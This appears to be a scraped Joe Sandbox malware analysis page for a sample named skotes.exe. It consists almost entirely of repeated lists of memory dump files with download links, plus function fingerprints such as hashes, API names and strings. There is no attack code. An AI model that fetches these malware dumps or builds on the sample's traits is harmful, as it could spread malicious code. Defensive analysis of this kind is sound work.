                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::details::FreeIdleProcessorRoot::SpinUntilVirtualstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: pContext
                                                                                                                                                                                                                                                  • API String ID: 3390424672-2046700901
                                                                                                                                                                                                                                                  • Opcode ID: 85db0178acf7c46d9ac776483770fa38a4a46d757023282b8b4eb151991369a1
                                                                                                                                                                                                                                                  • Instruction ID: a967e54dcae7a4dc7eb7dbd70a27208a26a4b2493dd9e5fc6db1d033dd95c273
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 85db0178acf7c46d9ac776483770fa38a4a46d757023282b8b4eb151991369a1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7321E735B006159BCB14BB69D895ABD73A5BFA6328F04012FE511873E1CB6CEC418A99
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  • C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, xrefs: 004ADFE8
                                                                                                                                                                                                                                                  • 6J, xrefs: 004AE034
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID: 6J$C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                  • API String ID: 0-2710734762
                                                                                                                                                                                                                                                  • Opcode ID: fc5f7313780df18aa499d9b71f8cfae6071f00e52407e2036743a1c9d9e95679
                                                                                                                                                                                                                                                  • Instruction ID: ced02e7f487a097450160dbe391ac93162f6601a95fd1d12cf4afa15d2d234ce
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fc5f7313780df18aa499d9b71f8cfae6071f00e52407e2036743a1c9d9e95679
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0321C8716082197F9B306F778C40E6B77DDEF22368B10451AF93897642E778EC005669
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • List.LIBCONCRT ref: 0049AEEA
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0049AF0F
                                                                                                                                                                                                                                                  • Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 0049AF4E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: pExecutionResource
                                                                                                                                                                                                                                                  • API String ID: 1772865662-359481074
                                                                                                                                                                                                                                                  • Opcode ID: 0f2af76741249781cff76c4b92cb239beca7d7c7e276f486b376cb1eccdde5ee
                                                                                                                                                                                                                                                  • Instruction ID: 7f9829f7792e40a20a017bc661a964dc8fdca7dc6e6259b2db1f3ca8267e0b40
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f2af76741249781cff76c4b92cb239beca7d7c7e276f486b376cb1eccdde5ee
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2021C575A412049BCF04FF59C852BAD77A5BF88304F10442FE501A7382DBB8AE148B99
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00494F24
                                                                                                                                                                                                                                                  • Concurrency::details::CacheLocalScheduleGroupSegment::CacheLocalScheduleGroupSegment.LIBCONCRT ref: 00494F66
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CacheGroupLocalSchedule$Concurrency::details::SegmentSegment::std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: count$ppVirtualProcessorRoots
                                                                                                                                                                                                                                                  • API String ID: 2663199487-3650809737
                                                                                                                                                                                                                                                  • Opcode ID: caee4f224213664f8514ef7367c017090adc2c9c35ed6b34b8f59fc590f58c2c
                                                                                                                                                                                                                                                  • Instruction ID: 16eff3212538d5e5335428b7a0f73093740b37a900a38585b684b9a5aa438f3f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: caee4f224213664f8514ef7367c017090adc2c9c35ed6b34b8f59fc590f58c2c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D921E234A00105EFCF04EF99C891EAD7BA1BF49304F10406FE50597691CB79AA02CB59
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 0049BA0E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
